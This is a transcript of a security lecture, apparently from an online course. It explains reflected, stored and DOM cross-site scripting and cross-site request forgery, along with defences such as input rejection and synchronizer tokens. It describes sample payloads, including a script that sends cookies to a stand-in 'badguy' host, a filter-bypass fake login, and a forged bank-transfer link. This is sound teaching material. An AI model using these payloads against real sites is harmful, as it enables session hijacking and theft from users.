[MUSIC] The next slide shows the essence
of a cross-site scripting. If you go to a web page,
the web server sends over commands, and your web browser interprets those
commands to draw up an image. Now, if you look at the first HTML,
which is the language used for these web pages, this one says,
start a paragraph and say hello. And then the script tags say,
between the beginning and the end of these tags,
execute whatever is there. And in this case, it's something you don't
expect and don't want, which is nasty. That's what is called malicious logic. So what happens in this case is
the web browser first puts up hello with the exclamation point and
then does the commands in the middle. And that's cross-site scripting. There are three forms of these attacks,
reflected, stored, and what's called DOM injection. The next slide shows a reflected attack. We have a website that requires you
to authenticate to gain access. Once you've gained that access,
the web stores essential cookie. So the cookie is stored wherever
your browser stores cookies. And the next time you connect to
that site, that site will say, send over your cookies, the authenticate
cookie goes over along with any others. And then the site says,
okay, you're authenticated, we'll just go ahead and act. Now, the way the attack usually
works is the attacker sends out a large number of messages,
emails typically, with a URL in them, and the URL
basically points to the remote site. But what it does is it contains a script, and the script will simply say,
copy the cookies for that site, and send them to this second site,
the bad guy and gal's site. So if you look at the HTML there,
it's going to draw up an image. And by the way, when this is done,
the image is often very small, like a pixel, so you can't see it. But in this case, the image it's going to
draw is simply something from xxx.yyy. However, when you try to log in to that
account there, you've got a script. And so what the script does
is it goes to the data and then sends over the URL
http://badguy.yyy/steal.cgi?, concatenated with the cookie for the appropriate website, that is xxx.yyy. And you can access that even if you
have third-party cookies turned off because it's being requested
by the web page you're going to, so it goes ahead and sends that out. And then presumably what will come back
is the legitimate name of the account, and then you'll be able to go ahead and
log in. So when the victim clicks
on that particular URL, the attacker gets all the cookies,
and thereby access as the victim. Going onto the next slide,
that's through the email and such. But spam filters are fairly
good about finding those. And in general, a good rule of thumb is don't click
on it if you don't know what's there. Or your mail system may not show HTML, may not draw HTML pages
when you look at the mail. So there's another trick you can use. Most people have gone to a blog
at least once in their life, and you see that remote people can
enter information into the blog. The data that you enter into the blog,
the blog entry, is saved on the server. And then when someone comes in to
view the blog, among other things, that entry will come up. Well, that entry comes up and
is drawn there on your browser. So why not embed commands in that? And that's basically what
a stored cross-site scripting is. The attack stores the malicious URL or HTML on a page where you will go. And it's important to understand that
it's not in the control of the person who controls the web server. Anyone who can write to the blog
can do this sort of thing. So here is an example, if my blog allows
me to insert HTML commands in what I enter into the blog when I'm typing
my comment, and most of them do. If they don't check for
particular commands, I can enter something like the line
under the blog comment allows this. And what it will do is
it will go ahead and download the script from
mysite/messwithyou.js, JavaScript, and then go ahead and
execute it in your browser. So what happens is if that command is in
the blog, the next person to look at it gets caught, and messwithyou will
go ahead and run in your browser. Now, the next slide talks about something
that's a little bit more complex, it's called DOM, Document Object Model. And this is really how browsers work,
they get a Document Object Model, and then use that model to display
the object, which is parts of a web page. Now, the reason this is interesting
is because stored XSS and reflected XSS, you assume that
the web page you're storing, or going to, or whatever is static. DOM XSS is similar, but
it allows you to do a little bit more. Since that remote page is static and
loaded in your browser when you visit, there's a, for example, a web page. It's going to write out the URL. The base URI of the document
with the URL is the prefix, and document.write will put it up on
your browser so you can see it. So the request that I
send is listed below. Now, what happens is, when the web browser receives that URL,
as soon as it gets to the sharp sign, it instantiates the page and
then executes what's between scripts. And so that will be an alert,
which will cause a beep. So now, when we go to this web page,
it goes ahead and runs document.write URL, and then the pound sign gets instantiated,
and they get a beep. So this is how DOM
cross-site scripting works. Now, the next slide
discusses combinations. And it's important to understand
that attacks can get very complex, so these can be combined. The first two are fairly easy because
they can be detected at the server, just look for scripts in the input URL,
okay, or in the body. If you see those scripts as you're
reading things or as your mail program is analyzing things, then you say, hey,
wait a minute, and you've caught it. The problem is that the third one,
the web pages on the server are static. But the DOM attack
tricks your browser into putting up something that appears to be
from the server, but has a few additions. So the source is where things come from,
the sink is where things go. What you do is you look for
sources that others control. On that web page, you have
the document base URI, that's dynamic, that's going to be whatever
it is in my browser. And as a result,
when my browser goes to print that or draw it up on my screen,
I am trusting whatever is there. So you need to be careful and be sure
here that when you output something or accept something from the, Server and then proceed to draw that,
you check it before you draw it. And we'll talk about
a couple of ways to do this. First, the wrong way. Here is an attempted fix, okay? The basic idea here is
that when I see a script here, I'm going to simply comment it out. So here's the web page, it's vulnerable. Notice the document.write, and
the document.URL.substring, and the document.URL.length,
all of that is JavaScript. And then notice that the pos
is the indexOf("name="). So the idea is a parameter will come over,
the parameter's key will be name, and then the value
was whatever follows name equals, okay? So that's what pos does,
it moves it beyond the end of name equals. So when you get the document.URL.length,
that gives you the length beyond the name equals, which is simply going to
be, presumably, the name of the person. And the URL substring pulls that out. And then the write simply writes up
the name, so it would be, welcome, hi, Matt, or whatever. And then it will go on and say,
welcome to our system, and so forth. Here's the attack,
the next slide shows the legitimate one, vulnerable.site/welcome.html?name=Matt. And so when I go to that website
with that URL, it'll say, hi, Matt, because it gets the name from
the field following the name. But what happens if I do
something a little nasty? The next one shows that. Now what happens is the name is a script,
so the browser is going to execute
alert(document.cookie), which will put up
the cookie in an alert box. So this one is basically harmless,
it notifies you that hey, look, I've got your cookie. But you can put a lot of other
things within that script, anything JavaScript can do,
you can put in there. So how do we avoid this? Let's try filtering, we scan the input for
something that begins with script and then ends with a close script tag,
this is on the next slide. Now, the problem is that script, so
why don't we just comment it out? That's easy solution, and you can see
where it says, and replace them with this. What I've done is I've replaced
script with an open comment, and I've replaced /script,
the closing tag, with a close comment. And now when that web page comes up
on my browser, it sees the comment, it sees the <!-- and says, okay,
I'm not parsing anything or doing anything until I see
the close comment, which it does. Here is why it doesn't work,
though, the next slide shows that. If you go back to the previous slide,
that's something. What happens if the attacker begins
the something with closed comment, puts in the malicious JavaScript,
and then ends it with open comment? And here's why that is inadequate, slide shows that,
that's exactly what's embedded there. And what this says is,
go to the URL http://none, and on an error open up
the fake login screen. And that way I can get your login data, when you go there, you'll log in and
I'll get all your data. So that's an example of
why that's inadequate. The problem is you can't simply replace
the beginning and the ending script tags. You've got to scan the something to
make sure that whatever is in there doesn't close the open tag you put in and open the closed tag you put in,
and have nasty stuff in between. The next slide, the filtering shows
exactly what the web browser will see. Notice the comments at the beginning and
at the end, and the image will still be drawn. This bypasses the filter completely. So how do you prevent this? Well, the basic rule is to apply
the principle of fail-safe defaults that we talked about earlier. Scan the input, if you do not know
that that input is good, reject it. Don't try to embed it,
don't try to sanitize it, just dump it because who knows how
browsers and HTML will evolve. There are specific things
that you know are good. For example, a string with no tags,
Accept that. But if it's got a tag in it, it may or
may not be good, so you reject it. And the other thing you
have to watch out for is you can't just scan looking for a open
bracket in the beginning of the tag. Because I can encode those in Unicode, for example, or in HTML special characters. And so when you scan that,
you won't see the open tag. But my browser sure will interpret
those Unicode symbols as open tag. So you have to watch out for the encoding. And the right way to do this, by the way,
is when the input comes in, make sure its encoding is canonical, that there's some
canonical form that you can map it to. And once you've done that mapping,
then you scan it. That way if they're using Unicode,
when you do the canonicalization, you'll either look for Unicode open tag. Or the Unicode will get
mapped into an ASCII or a UTF-8 character open bracket, and
you'll reject it on that basis. But again, the best thing here
to do is fail-safe defaults. If you don't know it's good, dump it. Now, there's a version of cross-site
scripting that's a little bit nastier, it's called cross-site request forgery. And the basic idea is as an attacker, I'll trick the user into submitting
information to a web application. But it's not going to be the web
application they think it is, it's going to be the one I have. So the approach basically
is to build the URL or a script and
then trick you into executing it. And here's a good example. I have a bank account,
Alice has a bank account. Alice wants to transfer $100 to Bob. Evil Edgar doesn't like that, and
so Evil Edgar is going to try and steal Alice's money. So the next slide shows how he does it. And in order to understand this, I have to show you what
a legitimate request looks like. It's littleoldbank.com, and
I have no idea if that really exists, by the way, it's just a made up URL. If it does,
I apologize to littleoldbank.com. Anyway, the legitimate request says, transfer to the account
Bob in the amount $100. So Alice logs into
Little Old Bank's website. Now, while she's logged in,
she gets a letter from Bob or from Edgar containing what you see there. Notice transfer to Ed's account and
the amount is $100. That's the source, the href,
where it's going to go. But of course, the text doesn't say that,
it says, see my new house, click here and you'll see it. She gets that letter and
it clicks there, boom. That request goes off to
littleoldbank.com, Alice is logged in, she therefore will execute that
command and Ed gets 100 bucks. So that's how this cross-site
request forgery works. Now, this one is a little bit primitive,
there are other ways to do it. The scenario that I just showed
you is called a GET scenario because the request is sent
to the server using a GET. There's another one called POST. The attacker there is going to provide
you with a form that you populate. And then when you submit it,
of course, the attacker gets the data. And this can be submitted
automatically using JavaScript, for example, the commands are there. So what it will do is you load that form, person fills it out, and
then it gets submitted. So how do you defend against that one? That one's a little bit trickier. The best way to do it is a technique
called the synchronizer token pattern. And the idea here is to bind the session with the particular user and
the particular windows. So when the session starts,
you generate a random token. Anything that is user sensitive,
you embed it. So that when the user responds,
the token comes back. That kills Edgar's attempt to
steal $100 from Alice because when that request goes over,
it doesn't have the token. And so the session says, wait a minute,
this is bogus and I'm going to ignore it. There are other things you can do as well. Check the HTTP origin header, for example. Be sure it comes from the particular
browser involved in the session. And on the client side,
if the browser is a sensitive site, like a bank, make sure that
during that session the client, the browser can't go to other sites, and
log off or close the browser when done. Because banks and sensitive sites almost
always use cookies that are deleted as soon as the session ends or
the browser is closed.